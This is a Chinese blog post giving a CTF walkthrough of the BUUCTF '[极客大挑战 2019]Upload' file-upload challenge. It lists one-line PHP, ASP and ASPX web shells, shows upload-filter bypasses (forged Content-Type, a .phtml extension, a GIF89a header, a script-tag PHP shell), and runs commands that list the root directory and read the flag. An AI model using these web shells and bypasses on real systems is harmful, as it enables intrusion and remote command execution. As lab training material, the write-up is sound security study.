极客大挑战2019Upload 1:

最新推荐文章于 2024-07-21 11:20:00 发布
最新推荐文章于 2024-07-21 11:20:00 发布
阅读量274 收藏 6
点赞数 5
分类专栏: BUUCTF 文章标签: web 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73673698/article/details/139548296
版权

 文件上传漏洞(一句话木马):http://t.csdn.cn/vviKs

文件头绕过:http://t.csdn.cn/h1t8G

首先是常见的一句话木马:

php: <?php @eval($_POST['pass']);?>、<?php system($_GET['cmd']);?>
asp: <%eval request ("pass")%>
aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

本题首先尝试的一句话木马为<?php system($_GET['cmd']);?>

在上传时进行抓包

再右键send to repeater

发现返回 Not Image所以我们将Content-Type一栏改为image/jpeg,再继续发送发现返回Not php所以我们将filename一项后面的文件后缀由.php改为.phtml继续发送返回

尝试将一句话木马<?php system($_GET['cmd']);?>    改为    <%php system($_GET['cmd']);%>发现返回

在一句话木马上方加上GIF89a?进行文件头绕过

上传成功但是查看发现一句话木马并未被成功执行

去看了一位大佬的视频尝试换一种一句话木马

<script language="php">eval($_GET['cmd']);</script>

上传成功

在url中的phtml后执行代码?cmd=system("ls /");

发现flag利用?cmd=system("cat /flag");

得到flag为: flag{ae76cb1d-5cbc-48ce-a709-cac5d285358a}

Sleep`
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUFCTF—[极客挑战 2019]Upload 1
good good study
05-12 1084
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload
siu~
09-07 1012
[极客挑战 2019]Upload 解题
[极客挑战 2019]Upload 1
xixixihan的博客
11-25 771
做题分享
文件上传 [极客挑战 2019]Upload 1
m0_75178803的博客
10-11 965
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
GeekUniversityWebTask:极客大学前端训练营作业
04-18
【标题】"极客大学前端训练营作业"揭示了这个压缩包内容主要涉及的是极客大学(GeekUniversity)组织的前端开发学习任务。在这个训练营中,学员们可能通过一系列练习和项目来提升自己的前端技能,特别是JavaScript...
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
微信小程序demo:极客学院
03-15
一个同学的毕业设计,微信小程序也可以做成毕业设计了吗?   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的...
C语言复习(笔记加例题)第一章:数据类型及其运算
weixin_55021541的博客
07-17 1035
通常在其他编程语言中用作字符串的缩写,但在 C 语言中,字符串是通过字符数组char a[]来表示的。:以下哪个类型是 C 语言中用来存储布尔值的?:以下哪个类型是 C 语言中用来存储字符的?:以下哪个不是 C 语言中的基本数据类型?2. C 运算符的种类、运算优先级和结合性。3. 不同类型数据间的转换与运算。4. C 表达式的类型和求值规则。并不是一个基本数据类型。:A,在 C 语言中,
OpenGL笔记十四之GLM数学库的配置与使用
小勇博客
07-20 303
— 2024-07-20 中午。
【Blockly图形化积木编程二次开发学习笔记】5.自动保存与恢复
乙酸氧铍的博客
07-21 79
/ 用户离开页面时自动将块备份到本地存储中。关闭后再次打开,工作区仍存在。// 从本地存储中恢复块。
C++笔记3:基类指针delete子类对象的内存泄漏问题
最新发布
subtitle_的博客
07-21 132
C++笔记3:基类指针delete子类对象的内存泄漏问题
算法刷题笔记 排列数字(C++实现)
hanmo22357的博客
07-17 290
一道简单的深度优先搜索(DFS)模板题,给出了DFS问题的一般思路以及C++代码实现
Vue3企业级项目开发实战课-笔记记录
tuku0801的专栏
07-20 802
实践 Vue 3 自研组件库开发、Node.js 服务端开发、Vue 3 结合 Node.js 的全栈项目开发以及全栈项目的单元测试等大厂常见的项目技术场景
Java并发编程与高并发解决方案笔记
tuku0801的专栏
07-17 1056
将结合大量图示及代码演示,带你掌握多线程并发编程(线程安全,线程调度,线程封闭,同步容器等)与高并发处理思路与手段(扩容,缓存,队列,拆分等),构建完整的并发与高并发知识体系
cs224w笔记(p1-p4)
m0_51118873的博客
07-18 589
图元是小的、固定的图结构,通常由少量的节点和边组成,它们在较大的图中频繁出现。它基于这样一个理念:一个节点的重要性不仅取决于它直接连接的节点数量,还取决于它所连接的节点的重要性。个人理解:首先有G图抽取出来的图元有以上3个,其次在这3个图元中不出现同构的位置有a,b,c,d,,然后将abcd依次放入v位置得出的具有不重复的表示有a->2种,b->1种,c->0种,d->2种。白话:如果一个节点到其余各点的最短的路径和是最短的,那么他是最重要的。白话:描述的是一个节点于周围节点之间的连接程度。
cs224w笔记(p5)
m0_51118873的博客
07-19 465
它特别关注两个节点共有的邻居节点,并给予那些在网络中不太常见的共有邻居更高的权重,而对于那些更常见的共有邻居则给予较低的权重。其中,Γ(𝑢)Γ(u) 表示节点 𝑢u 的邻居节点集合,Γ(𝑣)Γ(v) 表示节点 𝑣v 的邻居节点集合,Γ(𝑢)∩Γ(𝑣)Γ(u)∩Γ(v) 表示 𝑢u 和 𝑣v 的共有邻居节点集合。其中,𝐴A 和 𝐵B 分别代表两个集合,∣𝐴∩𝐵∣∣A∩B∣ 表示集合 𝐴A 与 𝐵B 的交集元素的数量,而 ∣𝐴∪𝐵∣∣A∪B∣ 表示集合 𝐴A 与 𝐵B 的并集元素的数量。
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值